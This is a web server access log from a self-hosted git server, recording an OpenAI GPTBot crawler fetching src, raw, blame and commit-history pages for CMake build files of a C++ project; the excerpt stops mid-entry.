"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11024] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12010] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39747] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10176] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16401] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11518] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10936] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" +[17/Feb/2026:15:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16918] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" +[17/Feb/2026:15:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21649] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" +[17/Feb/2026:15:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16918] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51204] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16918] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11825] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11269] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29812] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" [Client 